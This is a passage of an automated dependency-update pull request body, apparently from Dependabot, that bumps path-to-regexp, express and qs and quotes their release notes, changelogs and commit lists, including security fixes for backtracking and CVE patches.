href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `path-to-regexp` from 1.8.0 to 1.9.0\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/pillarjs/path-to-regexp/releases\"\u003epath-to-regexp's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003eFix backtracking in 6.x\u003c/h2\u003e\n\u003cp\u003e\u003cstrong\u003eFixed\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eAdd backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)  f1253b4\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.2...v6.3.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003eUpdated README\u003c/h2\u003e\n\u003cp\u003eNo API changes. Documentation only release.\u003c/p\u003e\n\u003cp\u003e\u003cstrong\u003eChanged\u003c/strong\u003e\u003c/p\u003e\n\u003cul\u003e\n\u003cli\u003eFix readme example  c7ec332\u003c/li\u003e\n\u003cli\u003eUpdate shield URL  e828000\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\"\u003ehttps://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.2.2\u003c/a\u003e\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/75a92c3d7c42159f459ab42f346899152906ea8c\"\u003e\u003ccode\u003e75a92c3\u003c/code\u003e\u003c/a\u003e 6.3.0\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/f1253b47b347dcb909e3e80b0eb2649109e59894\"\u003e\u003ccode\u003ef1253b4\u003c/code\u003e\u003c/a\u003e Add backtrack protection to 6.x (\u003ca href=\"https://redirect.github.com/pillarjs/path-to-regexp/issues/324\"\u003e#324\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/28a5b27bb9e7f09dddb573ac50923f2337ea0dbf\"\u003e\u003ccode\u003e28a5b27\u003c/code\u003e\u003c/a\u003e 6.2.2\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/270876d30b77c83b16c7bb01b578ae9e278c3faa\"\u003e\u003ccode\u003e270876d\u003c/code\u003e\u003c/a\u003e Test on min node 16\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/d5a42b69ae5fc128f85783714bbf08408d1560ee\"\u003e\u003ccode\u003ed5a42b6\u003c/code\u003e\u003c/a\u003e Run tests on ubuntu\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/1c265a158c8ffc8c4fb490fc1a9a5020b147d1f2\"\u003e\u003ccode\u003e1c265a1\u003c/code\u003e\u003c/a\u003e Upgrade dev deps, prettier format\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/c7ec332e87d8560673884d5629e1cb23cb03cb87\"\u003e\u003ccode\u003ec7ec332\u003c/code\u003e\u003c/a\u003e Fix readme example\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/25da491127d5dfd13eb5ad839bd3559622b77c56\"\u003e\u003ccode\u003e25da491\u003c/code\u003e\u003c/a\u003e Bump node v14 for tests\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/980d1db9b82fc85019c30da6e689df3beb27e12b\"\u003e\u003ccode\u003e980d1db\u003c/code\u003e\u003c/a\u003e Add v8 coverage\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/pillarjs/path-to-regexp/commit/e8280006c80604baaf18e8572a983d2a265a6e83\"\u003e\u003ccode\u003ee828000\u003c/code\u003e\u003c/a\u003e Update shield URL\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/pillarjs/path-to-regexp/compare/v6.2.1...v6.3.0\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `express` from 4.18.2 to 4.22.1\n\u003cdetails\u003e\n\u003csummary\u003eRelease notes\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/releases\"\u003eexpress's releases\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003ev4.22.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cblockquote\u003e\n\u003cp\u003e[!IMPORTANT]\u003cbr /\u003e\nThe prior release (4.22.0) included an erroneous breaking change related to the extended query parser. There is no actual security vulnerability associated with this behavior (CVE-2024-51999 has been rejected). The change has been fully reverted in this release.\u003c/p\u003e\n\u003c/blockquote\u003e\n\u003cul\u003e\n\u003cli\u003eRelease: 4.22.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6934\"\u003eexpressjs/express#6934\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.22.0...v4.22.1\"\u003ehttps://github.com/expressjs/express/compare/4.22.0...v4.22.1\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.22.0\u003c/h2\u003e\n\u003ch2\u003eImportant: Security\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eRefactor: improve readability by \u003ca href=\"https://github.com/sazk07\"\u003e\u003ccode\u003e@​sazk07\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6190\"\u003eexpressjs/express#6190\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: add support for Node.js@23.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6080\"\u003eexpressjs/express#6080\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eMethod functions with no path should error by \u003ca href=\"https://github.com/wesleytodd\"\u003e\u003ccode\u003e@​wesleytodd\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5957\"\u003eexpressjs/express#5957\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: updated github actions ci workflow by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6323\"\u003eexpressjs/express#6323\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eci: reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6336\"\u003eexpressjs/express#6336\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eBackport: ci: add node.js 24 to test matrix by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6506\"\u003eexpressjs/express#6506\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003echore(4.x): wider range for query test skip by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6513\"\u003eexpressjs/express#6513\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003euse tilde notation for certain dependencies by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6905\"\u003eexpressjs/express#6905\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6909\"\u003eexpressjs/express#6909\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e by \u003ca href=\"https://github.com/Phillip9587\"\u003e\u003ccode\u003e@​Phillip9587\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6919\"\u003eexpressjs/express#6919\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.22.0 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6921\"\u003eexpressjs/express#6921\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.2...4.22.0\"\u003ehttps://github.com/expressjs/express/compare/4.21.2...4.22.0\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.2\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eAdd funding field (v4) by \u003ca href=\"https://github.com/bjohansebas\"\u003e\u003ccode\u003e@​bjohansebas\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6065\"\u003eexpressjs/express#6065\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11 by \u003ca href=\"https://github.com/blakeembrey\"\u003e\u003ccode\u003e@​blakeembrey\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/5956\"\u003eexpressjs/express#5956\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003edeps: bump path-to-regexp@0.1.12 by \u003ca href=\"https://github.com/jonchurch\"\u003e\u003ccode\u003e@​jonchurch\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6209\"\u003eexpressjs/express#6209\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.2 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6094\"\u003eexpressjs/express#6094\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.1...4.21.2\"\u003ehttps://github.com/expressjs/express/compare/4.21.1...4.21.2\u003c/a\u003e\u003c/p\u003e\n\u003ch2\u003e4.21.1\u003c/h2\u003e\n\u003ch2\u003eWhat's Changed\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003eBackport a fix for CVE-2024-47764 to the 4.x branch by \u003ca href=\"https://github.com/joshbuker\"\u003e\u003ccode\u003e@​joshbuker\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6029\"\u003eexpressjs/express#6029\u003c/a\u003e\u003c/li\u003e\n\u003cli\u003eRelease: 4.21.1 by \u003ca href=\"https://github.com/UlisesGascon\"\u003e\u003ccode\u003e@​UlisesGascon\u003c/code\u003e\u003c/a\u003e in \u003ca href=\"https://redirect.github.com/expressjs/express/pull/6031\"\u003eexpressjs/express#6031\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003cp\u003e\u003cstrong\u003eFull Changelog\u003c/strong\u003e: \u003ca href=\"https://github.com/expressjs/express/compare/4.21.0...4.21.1\"\u003ehttps://github.com/expressjs/express/compare/4.21.0...4.21.1\u003c/a\u003e\u003c/p\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/expressjs/express/blob/v4.22.1/History.md\"\u003eexpress's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch1\u003e4.22.1 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eRevert security fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.22.0 / 2025-12-01\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eSecurity fix for \u003ca href=\"https://www.cve.org/CVERecord?id=CVE-2024-51999\"\u003eCVE-2024-51999\u003c/a\u003e (\u003ca href=\"https://github.com/expressjs/express/security/advisories/GHSA-pj86-cfqh-vqx6\"\u003eGHSA-pj86-cfqh-vqx6\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003edeps: use tilde notation for dependencies\u003c/li\u003e\n\u003cli\u003edeps: qs@6.14.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.2 / 2024-11-06\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.12\n\u003cul\u003e\n\u003cli\u003eFix backtracking protection\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.11\n\u003cul\u003e\n\u003cli\u003eThrows an error on invalid path values\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.1 / 2024-10-08\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eBackported a fix for \u003ca href=\"https://nvd.nist.gov/vuln/detail/CVE-2024-47764\"\u003eCVE-2024-47764\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.21.0 / 2024-09-11\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003eDeprecate \u003ccode\u003eres.location(\u0026quot;back\u0026quot;)\u003c/code\u003e and \u003ccode\u003eres.redirect(\u0026quot;back\u0026quot;)\u003c/code\u003e magic string\u003c/li\u003e\n\u003cli\u003edeps: serve-static@1.16.2\n\u003cul\u003e\n\u003cli\u003eincludes send@0.19.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: finalhandler@1.3.1\u003c/li\u003e\n\u003cli\u003edeps: qs@6.13.0\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch1\u003e4.20.0 / 2024-09-10\u003c/h1\u003e\n\u003cul\u003e\n\u003cli\u003edeps: serve-static@0.16.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: send@0.19.0\n\u003cul\u003e\n\u003cli\u003eRemove link renderization in html while redirecting\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: body-parser@0.6.0\n\u003cul\u003e\n\u003cli\u003eadd \u003ccode\u003edepth\u003c/code\u003e option to customize the depth level in the parser\u003c/li\u003e\n\u003cli\u003eIMPORTANT: The default \u003ccode\u003edepth\u003c/code\u003e level for parsing URL-encoded data is now \u003ccode\u003e32\u003c/code\u003e (previously was \u003ccode\u003eInfinity\u003c/code\u003e)\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eRemove link renderization in html while using \u003ccode\u003eres.redirect\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003edeps: path-to-regexp@0.1.10\n\u003cul\u003e\n\u003cli\u003eAdds support for named matching groups in the routes using a regex\u003c/li\u003e\n\u003cli\u003eAdds backtracking protection to parameters without regexes defined\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003edeps: encodeurl@~2.0.0\n\u003cul\u003e\n\u003cli\u003eRemoves encoding of \u003ccode\u003e\\\u003c/code\u003e, \u003ccode\u003e|\u003c/code\u003e, and \u003ccode\u003e^\u003c/code\u003e to align better with URL spec\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/li\u003e\n\u003cli\u003eDeprecate passing \u003ccode\u003eoptions.maxAge\u003c/code\u003e and \u003ccode\u003eoptions.expires\u003c/code\u003e to \u003ccode\u003eres.clearCookie\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c!-- raw HTML omitted --\u003e\n\u003c/blockquote\u003e\n\u003cp\u003e... (truncated)\u003c/p\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eCommits\u003c/summary\u003e\n\u003cul\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/12fae14531a78f19a2caaa5d4f58d9b01eaf3194\"\u003e\u003ccode\u003e12fae14\u003c/code\u003e\u003c/a\u003e 4.22.1\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/5ddf311af32e772a77fd48b6266ce2f1ba330e1a\"\u003e\u003ccode\u003e5ddf311\u003c/code\u003e\u003c/a\u003e Revert \u0026quot;sec: security patch for CVE-2024-51999\u0026quot;\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/49744abd1120484fe64d7bde1cd3197c32523b6e\"\u003e\u003ccode\u003e49744ab\u003c/code\u003e\u003c/a\u003e 4.22.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6921\"\u003e#6921\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6e97452f600a3b01719fbc5517d833c7646b0bb7\"\u003e\u003ccode\u003e6e97452\u003c/code\u003e\u003c/a\u003e sec: security patch for CVE-2024-51999\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/6a23d34d652b9e69a4486d2a2a0dea54b9685fa5\"\u003e\u003ccode\u003e6a23d34\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for \u003ccode\u003eqs\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6919\"\u003e#6919\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/8c12cdf93b89a4628b59179e3cc0722fc517d6b3\"\u003e\u003ccode\u003e8c12cdf\u003c/code\u003e\u003c/a\u003e deps: qs@6.14.0 (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6909\"\u003e#6909\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/7fea74fcf02764580f38f2a7f1932dfa54cddd90\"\u003e\u003ccode\u003e7fea74f\u003c/code\u003e\u003c/a\u003e deps: use tilde notation for certain dependencies (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6905\"\u003e#6905\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/dac7a0475a99e9dfc57b3b8e6d5bdf52813f1944\"\u003e\u003ccode\u003edac7a04\u003c/code\u003e\u003c/a\u003e chore: wider range for query test skip (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6513\"\u003e#6513\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/997919b48879bbd53171c3b4e5dd1b04ad139241\"\u003e\u003ccode\u003e997919b\u003c/code\u003e\u003c/a\u003e ci: add node.js 24 to test matrix (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6506\"\u003e#6506\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e\u003ca href=\"https://github.com/expressjs/express/commit/36fb59c6c7d9dfca0b08dfeafb5b6e4a249234a1\"\u003e\u003ccode\u003e36fb59c\u003c/code\u003e\u003c/a\u003e fix(ci): reorder \u003ccode\u003enpm i\u003c/code\u003e steps to fix ci for older node versions (\u003ca href=\"https://redirect.github.com/expressjs/express/issues/6336\"\u003e#6336\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003eAdditional commits viewable in \u003ca href=\"https://github.com/expressjs/express/compare/4.18.2...v4.22.1\"\u003ecompare view\u003c/a\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003c/details\u003e\n\u003cdetails\u003e\n\u003csummary\u003eMaintainer changes\u003c/summary\u003e\n\u003cp\u003eThis version was pushed to npm by \u003ca href=\"https://www.npmjs.com/~jonchurch\"\u003ejonchurch\u003c/a\u003e, a new releaser for express since your current version.\u003c/p\u003e\n\u003c/details\u003e\n\u003cbr /\u003e\n\nUpdates `qs` from 6.11.1 to 6.14.2\n\u003cdetails\u003e\n\u003csummary\u003eChangelog\u003c/summary\u003e\n\u003cp\u003e\u003cem\u003eSourced from \u003ca href=\"https://github.com/ljharb/qs/blob/main/CHANGELOG.md\"\u003eqs's changelog\u003c/a\u003e.\u003c/em\u003e\u003c/p\u003e\n\u003cblockquote\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.2\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: mark overflow objects for indexed notation exceeding \u003ccode\u003earrayLimit\u003c/code\u003e (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/546\"\u003e#546\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003earrayLimit\u003c/code\u003e means max count, not max index, in \u003ccode\u003ecombine\u003c/code\u003e/\u003ccode\u003emerge\u003c/code\u003e/\u003ccode\u003eparseArrayValue\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: throw on \u003ccode\u003earrayLimit\u003c/code\u003e exceeded with indexed notation when \u003ccode\u003ethrowOnLimitExceeded\u003c/code\u003e is true (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/529\"\u003e#529\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: enforce \u003ccode\u003earrayLimit\u003c/code\u003e on \u003ccode\u003ecomma\u003c/code\u003e-parsed values\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: fix error message to reflect arrayLimit as max index; remove extraneous comments (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/545\"\u003e#545\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Robustness] avoid \u003ccode\u003e.push\u003c/code\u003e, use \u003ccode\u003evoid\u003c/code\u003e\u003c/li\u003e\n\u003cli\u003e[readme] document that \u003ccode\u003eaddQueryPrefix\u003c/code\u003e does not add \u003ccode\u003e?\u003c/code\u003e to empty output (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/418\"\u003e#418\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] clarify \u003ccode\u003eparseArrays\u003c/code\u003e and \u003ccode\u003earrayLimit\u003c/code\u003e documentation (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/543\"\u003e#543\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[readme] replace runkit CI badge with shields.io check-runs badge\u003c/li\u003e\n\u003cli\u003e[meta] fix changelog typo (\u003ccode\u003earrayLength\u003c/code\u003e → \u003ccode\u003earrayLimit\u003c/code\u003e)\u003c/li\u003e\n\u003cli\u003e[actions] fix rebase workflow permissions\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.1\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[Fix] ensure \u003ccode\u003earrayLimit\u003c/code\u003e applies to \u003ccode\u003e[]\u003c/code\u003e notation as well\u003c/li\u003e\n\u003cli\u003e[Fix] \u003ccode\u003eparse\u003c/code\u003e: when a custom decoder returns \u003ccode\u003enull\u003c/code\u003e for a key, ignore that key\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: extract key segment splitting helper\u003c/li\u003e\n\u003cli\u003e[meta] add threat model\u003c/li\u003e\n\u003cli\u003e[actions] add workflow permissions\u003c/li\u003e\n\u003cli\u003e[Tests] \u003ccode\u003estringify\u003c/code\u003e: increase coverage\u003c/li\u003e\n\u003cli\u003e[Dev Deps] update \u003ccode\u003eeslint\u003c/code\u003e, \u003ccode\u003e@ljharb/eslint-config\u003c/code\u003e, \u003ccode\u003enpmignore\u003c/code\u003e, \u003ccode\u003ees-value-fixtures\u003c/code\u003e, \u003ccode\u003efor-each\u003c/code\u003e, \u003ccode\u003eobject-inspect\u003c/code\u003e\u003c/li\u003e\n\u003c/ul\u003e\n\u003ch2\u003e\u003cstrong\u003e6.14.0\u003c/strong\u003e\u003c/h2\u003e\n\u003cul\u003e\n\u003cli\u003e[New] \u003ccode\u003eparse\u003c/code\u003e: add \u003ccode\u003ethrowOnParameterLimitExceeded\u003c/code\u003e option (\u003ca href=\"https://redirect.github.com/ljharb/qs/issues/517\"\u003e#517\u003c/a\u003e)\u003c/li\u003e\n\u003cli\u003e[Refactor] \u003ccode\u003eparse\u003c/code\u003e: use 